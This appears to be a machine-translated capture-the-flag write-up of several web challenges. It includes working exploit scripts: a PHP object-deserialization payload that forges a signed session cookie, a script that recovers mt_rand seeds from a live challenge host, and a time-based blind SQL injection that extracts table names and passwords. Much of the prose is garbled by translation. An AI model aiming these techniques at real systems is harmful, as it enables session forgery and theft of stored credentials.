-Ordinal scale battle sequences
First source.zipget the source code, that need to get rankto a flag you can get
first find out if there is deserialized points, found in the constructor monster class unserializemethod
to find where it can make rankvalue becomes 1 Rank in class destructor found ways to $_SESSION['rank']become a place of
if we meet $this->key === $this->serverKey, that can be modified $_SESSION['rank'], then the first certainty is serialized object is an Rankobject class, and the class of public property $rankis 1.
So how to meet $this->key === $this->serverKeyit.
$this->serverKey = $_SERVER['key'], That serverKeyis modified to an unknown quantity, we controlled keythe needs and its strong equal. This is not difficult to think that we can follow to achieve dynamic keyand serverKeyalways the same, that is $this->key = &$this->serverKey. It should be noticed keyand serverKeytwo are private property and can not be accessed outside the class and modify it. So we only need to write a constructor within the class.
public function __construct(){
$this->key = &$this->serverKey;
}
After the visit to meet at the Monsterconstructor of the class object, it is important that Monsterthe properties of the object class $encryptKeyis unknown to us, if we know the value they can meet the requirements of the introduction of anti-cookie, knowledge used here is equivalent to a logical loopholes
in this cycle which will $this->encryptKeybe brought into circulation, if we $playernameassigned %s, which can be $this->encryptKeydirectly taken out
with $this->encryptKeythat is the thrust reverser can complete the construction of the cookie, directly attached to the next script, note the name of the registered user also participated in secret key calculations
<?php
class Rank
{
private $rank = 1;
private $serverKey; // 服务器的 Key
private $key;
public function __construct(){
$this->key = &$this->serverKey;
}
}
$a = new Rank();
$key = 'gkUFUa7GfPQui3DGUTHX6XIUS3ZAmClL';
$data = ['gappp',$key];
$encryptkey = '';
foreach($data as $key =>$value)
{
$encryptkey .=md5($encryptkey.$value);
}
$key = md5(serialize($a).$encryptkey);
$end = base64_encode(serialize($a).$key);
echo $end;
Replace cookie can
Second serve into the soul
Think of using random number seed blasting script obtains the random number seed, but the feeling does not seem enough time, reference
https://www.anquanke.com/post/id/196831
Simply means that you can take advantage of the first generation of random numbers 0 and 227 generated random number to calculate the random number seed
directly attached to the script
import os
import re
import requests
s = requests.session()
url = "https://twoshot.hgame.n3ko.co/random.php?times=228"
cookie = {'PHPSESSID':'6s7cbsqbpjgn9l4883sgbovfu6'}
c = s.get(url,cookies = cookie)
ans = str(c.text)
ans = eval(ans)
R0 = ans[0]
R227 = ans[227]
req = 'python reverse_mt_rand.py '+str(R0)+' '+str(R227)+' 0 0'
p = os.popen(req)
x = p.read()
p.close()
x = str(x.replace('\n',''))
url2 = "https://twoshot.hgame.n3ko.co/verify.php"
data = {"ans":x}
final = s.post(url = url2,cookies = cookie,data = data)
print(final.text)
Remember the same directory as the script into the calculation script
Cosmos secondary market
Bp threads using low buy, sell high thread, time purchase 100, sold 200; buy thread 50, the thread 100 can be sold
Cosmos message board -2
Log in and place all the registered filters in addition to alphanumeric symbols in delete_idfound at the injection point, because there is no echo, using time-based blind, directly attached to the script, and ran out of the user name and password to
import requests
import time
result = ""
cookie ={"PHPSESSID":"ps8l1kh75fac4kft6uumr02kot"}
for i in range(1,50):
print("正在测试第",i)
for j in range(37,127):
url = "http://139.199.182.61:19999/index.php?method=delete&delete_id=if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)%3ddatabase()),"+str(i)+",1))%3d"+str(j)+",sleep(5),1)%23"
#url = "http://139.199.182.61:19999/index.php?method=delete&delete_id=if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)%3d'user'),"+str(i)+",1))%3d"+str(j)+",sleep(5),1)%23"
#url = "http://139.199.182.61:19999/index.php?method=delete&delete_id=if(ascii(substr((select(group_concat(password))from(user)),"+str(i)+",1))%3d"+str(j)+",sleep(5),1)%23"
one_time = time.time()
r = requests.get(url,cookies=cookie)
#print(r.text)
two_time = time.time()
if two_time-one_time >= 5:
result = result+chr(j)
print('answer:',result)
Cosmos chat rooms 2.0
Too dishes, CSP did not find this point do not know how to upload bypassed, and so obediently reproduce the wp
